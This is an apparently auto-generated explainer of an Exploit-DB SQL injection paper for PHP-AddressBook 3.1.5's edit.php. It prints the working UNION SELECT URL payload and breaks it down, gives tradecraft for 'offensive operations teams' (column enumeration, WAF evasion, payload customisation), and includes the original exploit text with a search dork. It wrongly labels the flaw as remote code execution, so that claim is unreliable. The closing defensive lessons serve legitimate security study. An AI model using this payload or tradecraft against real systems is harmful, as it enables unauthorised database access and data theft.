By exploitdb papers bot•December 31, 2009•

papers

PHP-AddressBook 3.1.5 'edit.php' SQL Injection Explained

What this paper is

This paper details a SQL injection vulnerability found in the edit.php script of PHP-AddressBook version 3.1.5. The vulnerability allows an attacker to manipulate database queries by injecting malicious SQL code through the id parameter. This can lead to information disclosure, such as revealing database user, version, and name.

Simple technical breakdown

PHP-AddressBook is a web application for managing contacts. The edit.php script is likely used to display and edit existing contact entries. It probably fetches data from a database using an id to identify the specific record.

The vulnerability lies in how the id parameter is handled. Instead of properly sanitizing or parameterizing the input, the application directly incorporates the id value into an SQL query.

By sending a crafted id value, an attacker can:

Break out of the intended SQL query.
Inject a UNION SELECT statement.
Combine data from the original query (which might be ignored or return no rows due to the manipulated id) with data from a new query that extracts sensitive database information.

The exploit uses UNION SELECT to combine the attacker's chosen data (user, version, database name) with the expected structure of the original query.

Complete code and payload walkthrough

The provided exploit is a URL string, not a full script with code. The core of the exploit is the crafted URL:

www.[target].com/Script/edit.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14--

Let's break down the components:

www.[target].com/Script/edit.php: This is the target URL pointing to the vulnerable script.
?id=: This indicates the start of query parameters, and id is the vulnerable parameter.
-1: This is the initial value for the id. It's likely chosen to ensure that the original query (which would normally fetch a specific record) returns no results. This is a common technique to make the UNION SELECT part more prominent and easier to control the output.
+: This represents a space character in a URL.
union+select: This is the core of the SQL injection. It tells the database to combine the results of the original query with the results of a new SELECT statement.
1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14: This is the list of columns to be selected in the UNION SELECT statement.
- 1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14: These are literal integer values. They are used to match the number of columns expected by the original query. The attacker doesn't care about the data in these columns, only that the query structure is maintained.
- concat_ws(0x3a,user(),version(),database()): This is the crucial part for information disclosure.
  - concat_ws(separator, string1, string2, ...): This is a MySQL function that concatenates strings with a specified separator.
  - 0x3a: This is the hexadecimal representation of the colon character (:). This will be used as the separator between the extracted pieces of information.
  - user(): This is a MySQL function that returns the current database user.
  - version(): This is a MySQL function that returns the MySQL server version.
  - database(): This is a MySQL function that returns the current database name.
  - Combined: This function will output a string like root:5.0.51b:php_addressbook (example values).
--: This is a comment indicator in SQL. It tells the database to ignore any characters that follow it in the query. This is important to comment out the rest of the original SQL query, preventing syntax errors.

Mapping list:

www.[target].com/Script/edit.php?id= -> Target script and vulnerable parameter.
-1 -> Value to ensure original query returns no rows, facilitating UNION SELECT.
union+select -> SQL keyword to combine results from two SELECT statements.
1, 3, 4, ... 14 -> Placeholder values to match the column count of the original query.
concat_ws(0x3a,user(),version(),database()) -> Function to extract and format database credentials and name.
-- -> SQL comment to terminate the original query.

Payload Execution Flow:

The web server receives the request with the crafted id.
The edit.php script takes the id value (-1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14--).
The script likely constructs an SQL query similar to: SELECT col1, col2, ... FROM some_table WHERE id = -1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14--.
The database executes this query.
The WHERE id = -1 clause returns no rows.
The UNION SELECT combines the empty result set with the result of the attacker-controlled SELECT statement.
The concat_ws function executes, retrieving the database user, version, and database name, separated by colons.
The -- comments out the rest of the original query.
The edit.php script then attempts to display the results of this combined query. The injected data (user:version:database) will likely appear in the output where the original col2 (or similar) data was expected.

Practical details for offensive operations teams

Required Access Level: Unauthenticated. This is a remote code execution vulnerability exploitable via a web browser.
Lab Preconditions:
- A running instance of PHP-AddressBook v3.1.5 (or a similarly vulnerable version).
- A web server (e.g., Apache, Nginx) configured to serve the PHP application.
- A MySQL database backend configured for the application.
- Network accessibility to the target web server.
Tooling Assumptions:
- A web browser for manual testing.
- A web proxy (e.g., Burp Suite, OWASP ZAP) to intercept and modify requests.
- SQL injection tools (e.g., sqlmap) could automate this, but understanding the manual exploit is key.
Execution Pitfalls:
- URL Encoding: Spaces ( ) are represented by + or %20 in URLs. Ensure correct encoding. Other special characters might also need encoding.
- Database Type: The exploit uses MySQL-specific functions (user(), version(), database(), concat_ws(), --). It will not work directly against other database systems (e.g., PostgreSQL, SQL Server, Oracle) without modification.
- Column Count Mismatch: If the original edit.php query uses a different number of columns than the 14 provided in the exploit, the UNION SELECT will fail with a syntax error. The attacker would need to enumerate the correct column count.
- Output Display: The success of seeing the data depends on how edit.php displays the query results. If it only displays specific fields and the injected data is not rendered, the exploit might appear to fail even if the data was retrieved.
- WAF/IDS: Web Application Firewalls (WAFs) or Intrusion Detection Systems (IDS) might detect the UNION SELECT pattern or specific SQL keywords.
- Application Logic: If the application performs strict validation on the id parameter (e.g., expecting only integers), the exploit might be blocked before reaching the database.
Tradecraft Considerations:
- Reconnaissance: Identify the target application and its version. Look for common web application vulnerabilities.
- Enumeration: If the initial exploit fails due to column count, use techniques to enumerate the number of columns in the original query. This can be done by trying UNION SELECT NULL, NULL, ... with increasing numbers of NULLs until the query succeeds.
- Payload Customization: Adapt the concat_ws part to extract other desired information if needed, or to exfiltrate data in different formats.
- Stealth: Avoid overly aggressive scanning. For authorized engagements, focus on understanding the impact and reporting findings.

Where this was used and when

Context: This exploit targets a specific web application (PHP-AddressBook) and a particular script (edit.php). It's representative of common SQL injection vulnerabilities found in older, less securely coded PHP web applications.
Timeframe: The paper was published in December 2009. This type of vulnerability was prevalent in web applications during the late 2000s and early 2010s. While PHP-AddressBook might be outdated, the underlying SQL injection technique remains relevant for understanding how web applications can be compromised.

Defensive lessons for modern teams

Input Validation and Sanitization: Never trust user input. All data received from the client (URL parameters, form fields, cookies, etc.) must be validated and sanitized before being used in database queries.
Parameterized Queries (Prepared Statements): This is the most effective defense against SQL injection. Instead of building SQL strings with user input, use parameterized queries where the SQL logic is separated from the data. The database engine treats the input strictly as data, not executable code.
Least Privilege Principle: The database user account used by the web application should have only the minimum necessary permissions. It should not have privileges to execute administrative commands or access sensitive system tables unless absolutely required.
Web Application Firewalls (WAFs): WAFs can provide a layer of defense by detecting and blocking common SQL injection patterns. However, they are not foolproof and should be used in conjunction with secure coding practices.
Regular Patching and Updates: Keep all web applications, frameworks, and server software up to date with the latest security patches.
Error Handling: Configure applications to display generic error messages to users. Detailed database error messages can leak sensitive information to attackers.

ASCII visual (if applicable)

This exploit is a direct manipulation of a URL and SQL query. An ASCII visual for the flow might look like this:

+-----------------+      +-----------------+      +---------------------+
| Attacker's      |----->| Web Server      |----->| PHP-AddressBook     |
| Browser/Tool    |      | (Receives Req)  |      | (edit.php script)   |
+-----------------+      +-----------------+      +----------+----------+
                                                             |
                                                             | (Constructs SQL Query)
                                                             v
                                                     +---------------------+
                                                     | Database Server     |
                                                     | (MySQL)             |
                                                     |                     |
                                                     | - Executes Query    |
                                                     | - Returns Data      |
                                                     +----------+----------+
                                                                |
                                                                | (Results Sent Back)
                                                                v
                                                     +---------------------+
                                                     | PHP-AddressBook     |
                                                     | (Displays Results)  |
                                                     +---------------------+

Source references

Paper ID: 10877
Paper Title: PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection
Author: Hussin X
Published: 2009-12-31
Paper URL: https://www.exploit-db.com/papers/10877
Raw Exploit URL: https://www.exploit-db.com/raw/10877

Original Exploit-DB Content (Verbatim)

@   php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability


@    Author: Hussin X

@    Home :  www.iq-ty.com<http://www.iq-ty.com>,

@    email:  darkangel_g85[at]Yahoo[dot]com

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

@    script : http://sourceforge.net/project/showfiles.php?group_id=157964

@    DorK   : php-addressbook v3.1.5



ExPloiT :

www.[target].com/Script/edit.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14--




end

IQ-SecuritY FoRuM